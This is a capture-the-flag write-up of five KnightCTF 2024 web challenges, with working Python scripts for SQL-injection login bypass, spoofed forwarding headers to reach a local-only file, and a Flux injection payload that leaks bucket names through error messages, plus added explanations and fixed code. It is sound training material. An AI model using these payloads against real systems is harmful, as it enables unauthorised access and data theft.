KnightCTF 2024 WEB writeups
WEB
Levi Ackerman
Challenge info
Levi Ackerman is a robot!
N:B: There is no need to do bruteforce.
Author: saif
Target : http://66.228.53.87:5000/
My solution:
A warm-up challenge; the description hints at "robot", i.e. robots.txt.
Requesting /robots.txt directly reveals a disallowed path:
Disallow : /l3v1_4ck3rm4n.html
Requesting that path returns the flag:
KCTF{1m_d01n6_17_b3c4u53_1_h4v3_70}
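Disallow entries are meant to keep crawlers away from paths, but they do nothing to stop a human reading the file, which is why robots.txt is an early recon stop. The following is an added example (not part of the original writeup) that parses a robots.txt the way you would before walking the listed paths; it tolerates the odd "Disallow :" spacing seen on this target, strips comments, and skips Allow/Sitemap lines. The sample text is constructed here, and fetch_hidden_paths assumes a host that serves robots.txt at the root.

```python
import re
import urllib.request

# Constructed sample modelled on the challenge's robots.txt; not the real file.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow : /l3v1_4ck3rm4n.html   # note the space before the colon, as seen on the target
Disallow: /admin/
Allow: /public/
# Disallow: /commented-out
Sitemap: http://example.invalid/sitemap.xml
"""

# Directive name, optional whitespace around the colon, then the path token.
DIRECTIVE = re.compile(r"^\s*(disallow|allow)\s*:\s*(\S*)", re.IGNORECASE)


def hidden_paths(robots_txt):
    """Return the Disallow targets in file order, de-duplicated, ignoring comments and empty rules."""
    found = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0]          # '#' starts a comment anywhere on the line
        m = DIRECTIVE.match(line)
        if not m or m.group(1).lower() != "disallow":
            continue                           # Allow, Sitemap, User-agent, blank lines
        path = m.group(2)
        if path and path not in found:         # "Disallow:" with no path means "allow all"
            found.append(path)
    return found


def fetch_hidden_paths(base_url, timeout=10):
    """Download <base_url>/robots.txt and return its Disallow targets (assumed layout)."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/robots.txt", timeout=timeout) as resp:
        return hidden_paths(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    for p in hidden_paths(SAMPLE_ROBOTS):
        print(p)
```

Run it against a live host with fetch_hidden_paths("http://66.228.53.87:5000/"); each returned path is then simply requested in the browser.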
Kitty
Challenge info
Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.
N:B: There is no need to do bruteforce.
Author: Munazir (YCF)
Target : http://45.33.123.243:5020/
My solution:
Weak credentials? Tried admin, which fails. Reading the JavaScript in the page source shows what the dashboard does:
the post form only forwards input to /execute when it starts with "cat flag.txt" (see the if statement in the dashboard source below), so submitting exactly "cat flag.txt" in that form
returns the flag.
Alternatively, get past the login with SQL injection in the password field:
import requests
session = requests.Session()
base_URL = 'http://45.33.123.243:5020/'
# The password closes the quoted string and appends an always-true condition;
# the rest of the server's query is commented out.
login_data = {
'username': 'yes',
'password': '" or 1=1; -- "'
}
# The login endpoint takes JSON; the session keeps the cookie it sets
req = session.post(f'{base_URL}login', json=login_data)
req = session.get(f'{base_URL}dashboard')
print(req.text)
This bypasses the login (the username does not even need to exist) and returns the dashboard:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Modern Dashboard</title>
<link rel="stylesheet" href="/static/dashboard.css">
</head>
<body>
<div class="container">
<header>
<h1>Welcome to the Dashboard</h1>
</header>
<section class="content">
<h2>Latest Posts</h2>
<div class="post">
<h3>Post Title 1</h3>
<p>This is some content for the first post.</p>
</div>
<div class="post">
<h3>Post Title 2</h3>
<p>This is some content for the second post.</p>
</div>
<div class="post">
<h3>Post Title 3</h3>
<p>This is some content for the third post.</p>
</div>
<!-- You can add more posts dynamically here -->
</section>
<section class="posts">
<form id="postsForm" onsubmit="addPost(event)">
<label for="post_input">Enter Post:</label><br>
<input type="text" id="post_input" name="post_input">
<button type="submit">Execute</button>
</form>
</section>
</div>
<script>
function addPost(event) {
event.preventDefault();
const post_in = document.getElementById('post_input').value;
if (post_in.startsWith('cat flag.txt')) {
fetch('/execute', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: `post_input=${encodeURIComponent(post_in)}`
})
.then(response => response.text())
.then(result => {
const contentSection = document.querySelector('.content');
const newPost = document.createElement('div');
newPost.classList.add('post');
newPost.innerHTML = `<h3>Flag Post</h3><p>${result}</p>`;
contentSection.appendChild(newPost);
});
} else {
const contentSection = document.querySelector('.content');
const newPost = document.createElement('div');
newPost.classList.add('post');
newPost.innerHTML = `<h3>User Post</h3><p>${post_in}</p>`;
contentSection.appendChild(newPost);
}
}
</script>
</body>
</html>
The check in addPost is purely client-side; /execute itself accepts the command, so the script only needs to post it directly:
import requests
session = requests.Session()
base_URL = 'http://45.33.123.243:5020/'
# forms data with sql injection
login_data = {
'username': 'yes',
'password': '" or 1=1; -- "'
}
# Login to get access to dashboard
req = session.post(f'{base_URL}login', json=login_data)
# Set params
payload = {'post_input': 'cat flag.txt'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Retrieve flag
req = session.post(f'{base_URL}execute', data=payload, headers=headers)
print(req.text)
#KCTF{Fram3S_n3vE9_L1e_4_toGEtH3R}
Gain Access 1
Challenge info
The web challenges are very much similar to real life application bugs. This is going to be a series of Gain Access with 3 challenges unlocks upon solving one by one. By solving these challenges, you'll gain a practical knowledge of Authentication Bypass Vulnerabilites as well as business logic error. The only difference is you'll not get any bounty but you'll get flags. Give it a try. And keep in mind, Don't make it hard, keep it simple. All the best. Solve the challenges & be a cyber knight.
No need to bruteforce. There's a rate limit. If you send continuous requests, you'll be blocked for 3 minutes.
Author: 0xt4req
Target : http://45.33.123.243:13556/
My solution:
Visiting the site gives the login page.
The browser console reveals an account: root@knightctf.com
Directory scanning turns up a robots.txt,
which points at: /r3s3t_pa5s.php
Opening it shows: No token provided.
So we need a token. Intercept the traffic.
Submit that email in the forgot-password form and capture the exchange; the intercepted traffic contains the reset token (it is handed to the requester instead of being delivered only to the mailbox).
Go back to /r3s3t_pa5s.php, supply that token, and set a new password.
On success the page says: Password Updated Succesfully.
Log in again and the flag is on the page.
Alternatively, skip the reset entirely and bypass the password check with SQL injection:
exp:
import requests
session = requests.Session()
base_URL = 'http://45.33.123.243:13556/'
# Fetch the index first so the session picks up any cookie the site sets
req = session.get(f'{base_URL}')
# Known account from the console; the password closes the quote and forces the WHERE clause true
login_data = {
'admin_email': 'root@knightctf.com',
'admin_password': "' or 1=1; -- ",
'submit_btn': "Submit"
}
# The form posts back to index.php as regular form data (not JSON)
req = session.post(f'{base_URL}index.php', data=login_data)
print(req.text)
#KCTF{ACc0uNT_tAk3Over}
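Both Kitty and Gain Access 1 fall to the same bug: the login query is assembled by string concatenation, so a quote in the password ends the literal and `or 1=1` makes the WHERE clause true for every row. The following is an added example, not code from the challenges or their servers, that reproduces the bug against a constructed in-memory SQLite table and shows the parameterised query that closes it. The table, the email/password values and the function names are assumptions for illustration; the payload is the one used in the writeup above.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge's admin table (not the real schema or data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (email TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('root@knightctf.com', 'correct-horse')")
    return conn


def login_vulnerable(conn, email, password):
    """Query built by concatenation: a quote in the input is parsed as SQL, not as data.
    Returns the matched email, or None."""
    sql = ("SELECT email FROM admins WHERE email = '" + email
           + "' AND password = '" + password + "'")
    # With password = "' or 1=1; -- " the statement becomes
    #   ... AND password = '' or 1=1; -- '
    # and the OR makes it true for every row.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Parameterised query: the driver binds the values separately, so they are never
    interpreted as SQL no matter what characters they contain."""
    row = conn.execute(
        "SELECT email FROM admins WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1; -- "
    print("vulnerable:", login_vulnerable(db, "yes", payload))   # logs in as the first user
    print("safe:      ", login_safe(db, "yes", payload))         # None
```

Note that the vulnerable version logs the attacker in as whichever row the database returns first, which is why a made-up username ("yes") works in Kitty; the real fix is binding, not filtering quotes.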
README
Challenge info
Read me if you can!!
N:B: There is no need to do bruteforce.
Author: saif
Target : http://66.228.53.87:8989/
My solution:
The page has an input field that reads a file by name. A quick script to try it:
import requests
base_URL = 'http://66.228.53.87:8989/'
# Any readable file name goes in the file= query parameter
file = "text.txt"
req = requests.get(f'{base_URL}fetch?file={file}')
print(req.text)
#{"result":"Yes! You can read files! Dont ask for hint its ezz!!"}
Asking for flag.txt instead returns an error:
{"result":"403 Access Denied"}
The file is restricted to local callers, so we need to make the request look like it comes from localhost. The server decides "local" from client-supplied headers, which we can set freely:
import requests
base_URL = 'http://66.228.53.87:8989/'
file_path = "flag.txt"
# Common IP-forwarding headers, all claiming the request originates from 127.0.0.1.
# Which one the server trusts is unknown, so send the whole set.
headers = {
'X-Originating-IP': '127.0.0.1',
'X-Forwarded-For': '127.0.0.1',
'X-Forwarded': '127.0.0.1',
'Forwarded-For': '127.0.0.1',
'X-Remote-IP': '127.0.0.1',
'X-Remote-Addr': '127.0.0.1',
'X-ProxyUser-Ip': '127.0.0.1',
'X-Original-URL': '127.0.0.1',
'Client-IP': '127.0.0.1',
'True-Client-IP': '127.0.0.1',
'Cluster-Client-IP': '127.0.0.1',
'Host': 'localhost'
}
req = requests.get(f'{base_URL}fetch?file={file_path}', headers=headers)
print(req.text)
#{"result":"KCTF{kud05w3lld0n3!}"}
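The bypass works because the server reads "where did this request come from" out of headers that any client can write. The following is an added example, not the challenge's server code, contrasting that mistake with the check a practitioner would write: use the TCP peer address, consult X-Forwarded-For only when the peer is a proxy you operate, and even then take the hop the proxy appended rather than the one the client put first. The mock /fetch endpoint, the file contents, the trusted-proxy address 10.0.0.5 and the function names are assumptions for illustration.

```python
LOCAL = "127.0.0.1"
# Assumed address of a reverse proxy we operate; not something from the challenge.
TRUSTED_PROXIES = {"10.0.0.5"}

# Headers the vulnerable check consults, in the order it tries them.
SPOOFABLE = ("x-forwarded-for", "x-real-ip", "client-ip", "true-client-ip",
             "x-originating-ip", "x-remote-addr")

# Constructed file store standing in for the challenge's readable files.
FILES = {"text.txt": "Yes! You can read files!", "flag.txt": "flag-contents-go-here"}


def _lower(headers):
    """Header names are case-insensitive; normalise once."""
    return {k.lower(): v for k, v in headers.items()}


def is_local_vulnerable(remote_addr, headers):
    """What the challenge server evidently does: believe any forwarding header the
    client chose to send, and only fall back to the real peer address if none is present."""
    h = _lower(headers)
    for name in SPOOFABLE:
        if name in h:
            return h[name].split(",")[0].strip() == LOCAL
    return remote_addr == LOCAL


def is_local_safe(remote_addr, headers, trusted_proxies=TRUSTED_PROXIES):
    """Decide from the TCP peer. Only when that peer is our own proxy is X-Forwarded-For
    meaningful, and then the rightmost entry is the one the proxy appended; anything to
    its left was supplied by the client and is untrusted."""
    if remote_addr not in trusted_proxies:
        return remote_addr == LOCAL
    xff = _lower(headers).get("x-forwarded-for", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    if not hops:
        return False            # proxy did not tell us the client; fail closed
    return hops[-1] == LOCAL


def fetch(remote_addr, headers, filename, is_local):
    """Mock of the /fetch?file= endpoint: flag.txt is only served to local callers,
    using whichever locality check is passed in."""
    if filename == "flag.txt" and not is_local(remote_addr, headers):
        return {"result": "403 Access Denied"}
    return {"result": FILES.get(filename, "no such file")}


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1", "Host": "localhost"}
    print(fetch("203.0.113.9", spoof, "flag.txt", is_local_vulnerable))  # flag served
    print(fetch("203.0.113.9", spoof, "flag.txt", is_local_safe))        # 403
```

The same reasoning applies to Host: it is part of the request, so "Host: localhost" proves nothing about the sender either.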
Fluxx
Challenge info
Recently I have made a simple app for monitoring and analyzing metrics, events, and real-time data.I used a database which is designed for handling high volumes of timestamped data. But I think its vulnerable find it and get he flag.
To be noted: The challenge resets after sometime. So please wait for a while if you see any error.
Author: saif
Target : http://66.228.53.87:9001/
My solution:
Visiting the site shows:
Please visit /query?data= to travel with time.
Send a simple probe to see how the parameter is handled:
import requests
base_URL = 'http://66.228.53.87:9001/'
# A classic SQL probe; the point is only to provoke an error that identifies the backend
data = '1" OR 1=1--'
req = requests.get(f'{base_URL}query?data={data}')
print(req.text)
The response is a parser error:
HttpError: compilation failed: error @1:82-1:158: expected RPAREN, got EOF
error @1:152-1:153: invalid expression @1:151-1:152: =
error @1:155-1:158: got unexpected token in string expression @1:158-1:158: EOF
Searching on the challenge description (a time-series database, "travel with time") turns up a forum post about exactly this error: https://community.influxdata.com/t/query-throws-rparen-got-eof-error/18940
New to me: InfluxDB NoSQL (Flux) injection; see https://rafa.hashnode.dev/influxdb-nosql-injection. The payload closes the string literal the input lands in, yields the original query, then runs a second statement that lists buckets and calls die() with a bucket name, so the name leaks through the error message:
") |> yield(name: "1337")
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name))
//
Enumeration exp (the regex selects buckets by first letter; die() then reports the full name, so one hit is enough):
import requests, urllib.parse
base_URL = 'http://66.228.53.87:9001/'
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for char in list(letters):
# ") closes the string and the surrounding call; newline starts a new Flux statement;
# the trailing // comments out whatever the server appends after our input
payload = f'") |> yield(name: "1337")\nbuckets() |> filter(fn: (r) => r.name =~ /^{char}.*/ and die(msg:r.name))\n//'
# safe='' so that / and the newline are percent-encoded rather than left in the URL
encoded_payload = urllib.parse.quote(payload, safe='')
req = requests.get(f'{base_URL}query?data={encoded_payload}')
# An empty result means no bucket starts with this letter; anything else is the die() error
if req.text != '[]':
print(req.text)
#KCTF{g0UPqVWa0eUT2wF2ipzX3v5pxikvqYhxR9OL}